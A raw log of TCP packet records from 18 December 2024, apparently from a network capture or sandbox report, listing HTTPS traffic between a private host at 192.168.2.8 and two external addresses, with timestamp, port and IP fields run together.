                                                                                                                                                                          Dec 18, 2024 13:06:22.830526114 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:22.830533981 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.830585003 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:22.832040071 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.832125902 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:22.843291044 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.843323946 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.843353033 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:22.843364954 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.843384027 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:22.843405962 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:22.843411922 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.856451035 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.856477022 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.856509924 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:22.856519938 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.856575966 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:22.856581926 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.856823921 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:22.862230062 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.862251043 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.862303019 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:22.862309933 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.862343073 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:22.862346888 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.870332003 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.870357990 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.870388031 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:22.870398998 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.870428085 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:22.923718929 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:22.923768997 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.970571041 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:22.995987892 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.996000051 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.996018887 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.996028900 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.996056080 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:22.996081114 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.996107101 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:22.996123075 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:22.996141911 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:23.001935959 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:23.001964092 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:23.001996994 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:23.002015114 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:23.002031088 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:23.002053976 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:23.007821083 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:23.007842064 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:23.007896900 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:23.007916927 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:23.007936001 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:23.030457973 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:23.030514002 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:23.030549049 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:23.030689001 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:23.030710936 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:23.030756950 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:23.037194967 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:23.037220955 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:23.037278891 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:23.037278891 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:23.037301064 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:23.037322998 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:23.037322998 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:23.050937891 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:23.050970078 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:23.051193953 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:23.051229000 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:23.057056904 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:23.057113886 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:23.057163954 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:23.057182074 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:23.057213068 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:23.062767029 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:23.062820911 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:23.062856913 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:23.062870979 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:23.062882900 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:23.111197948 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:23.111227036 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:23.158065081 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:23.193070889 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:23.193087101 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:23.193109989 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:23.193119049 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:23.193136930 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:23.193197966 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:23.193207026 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:23.193250895 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:23.193856955 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:23.199764013 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:23.199784040 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:23.199806929 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:23.199826956 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:23.199834108 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:23.199877977 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:23.199882984 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:23.199914932 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:23.207153082 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:23.207173109 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:23.207207918 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:23.207215071 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:23.207226038 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:23.207262039 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:23.232819080 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:23.232846975 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:23.232877970 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:23.232892036 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:23.232919931 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:23.240353107 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:23.240391970 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:23.240417957 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:23.240423918 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:23.240473986 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:23.240608931 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:23.240698099 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:23.247186899 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:23.247210026 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:23.247256041 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:23.247268915 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:23.247298002 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:23.247325897 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:23.247701883 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:23.252473116 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:23.252496004 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:23.252569914 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:23.252580881 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:23.252686024 CET443497183.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:23.252835989 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:23.253844976 CET49718443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:23.498282909 CET49719443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:23.498308897 CET443497193.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:23.498372078 CET49719443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:23.498646021 CET49719443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:23.498661995 CET443497193.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:25.372934103 CET443497193.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:25.375284910 CET49719443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:25.375372887 CET443497193.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:26.185246944 CET443497193.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:26.236239910 CET49719443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:26.238581896 CET443497193.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:26.238591909 CET443497193.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:26.238607883 CET443497193.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:26.238619089 CET443497193.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:26.238672972 CET49719443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:26.238686085 CET443497193.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:26.238697052 CET443497193.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:26.238708973 CET49719443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:26.238740921 CET49719443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:26.437436104 CET443497193.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:26.437469006 CET443497193.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:26.437505960 CET443497193.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:26.437532902 CET49719443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:26.437572956 CET443497193.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:26.437589884 CET49719443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:26.486247063 CET49719443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:26.490322113 CET443497193.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:26.490350962 CET443497193.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:26.490437984 CET49719443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:26.490466118 CET443497193.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:26.490513086 CET49719443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:26.497761011 CET443497193.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:26.497909069 CET443497193.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:26.497966051 CET49719443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:26.497987986 CET443497193.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:26.548863888 CET49719443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:26.601485014 CET443497193.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:26.601496935 CET443497193.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:26.601541042 CET443497193.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:26.601572037 CET443497193.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:26.601582050 CET443497193.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:26.601624012 CET49719443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:26.601639986 CET443497193.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:26.601670980 CET49719443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:26.642540932 CET49719443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:26.672038078 CET443497193.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:26.672054052 CET443497193.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:26.672096968 CET443497193.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:26.672131062 CET443497193.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:26.672141075 CET443497193.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:26.672235966 CET49719443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:26.672255039 CET443497193.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:26.672373056 CET49719443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:26.692416906 CET443497193.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:26.692425013 CET443497193.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:26.692472935 CET443497193.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:26.692549944 CET49719443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:26.692549944 CET49719443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:26.692570925 CET443497193.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:26.692650080 CET49719443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:26.710855007 CET443497193.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:26.710907936 CET443497193.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:26.710944891 CET443497193.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:26.711019039 CET49719443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:26.711040974 CET49719443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:26.716285944 CET49719443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:26.730163097 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:26.730201960 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:26.730329990 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:26.730546951 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:26.730570078 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:28.604163885 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:28.606208086 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:28.606225014 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:29.550539970 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:29.595597029 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:29.657993078 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:29.658030987 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:29.658088923 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:29.658164024 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:29.658176899 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:29.658186913 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:29.658207893 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:29.658269882 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:29.658274889 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:29.704988003 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:30.115209103 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:30.115245104 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:30.115294933 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:30.115349054 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:30.115370035 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:30.115401030 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:30.115452051 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:30.119185925 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:30.173754930 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:30.370652914 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:30.370686054 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:30.370722055 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:30.370737076 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:30.370758057 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:30.370764017 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:30.370786905 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:30.370791912 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:30.370816946 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:30.370836020 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:30.470088959 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:30.470199108 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:30.470346928 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:30.470361948 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:30.517541885 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:30.609337091 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:30.609363079 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:30.609467983 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:30.609479904 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:30.658113956 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:30.853883982 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:30.853893995 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:30.853931904 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:30.853946924 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:30.854023933 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:30.854023933 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:30.854032993 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:30.854077101 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:30.943176985 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:30.986227036 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:31.298572063 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:31.298626900 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:31.298680067 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:31.298700094 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:31.298731089 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:31.298791885 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:31.298803091 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:31.298852921 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:31.298858881 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:31.345590115 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:31.539340973 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:31.539352894 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:31.539395094 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:31.539419889 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:31.539450884 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:31.539463043 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:31.539513111 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:31.782685995 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:31.782702923 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:31.782727957 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:31.782758951 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:31.782773018 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:31.782805920 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:31.782814980 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:31.782902002 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:31.830032110 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:32.019171953 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:32.019186974 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:32.019222021 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:32.019237041 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:32.019260883 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:32.019296885 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:32.019304037 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:32.019340992 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:32.064393997 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:32.245578051 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:32.245592117 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:32.245625019 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:32.245637894 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:32.245683908 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:32.245693922 CET443497203.5.237.170192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:32.245702028 CET49720443192.168.2.83.5.237.170
                                                                                                                                                                          Dec 18, 2024 13:06:32.245729923 CET49720443192.168.2.83.5.237.170
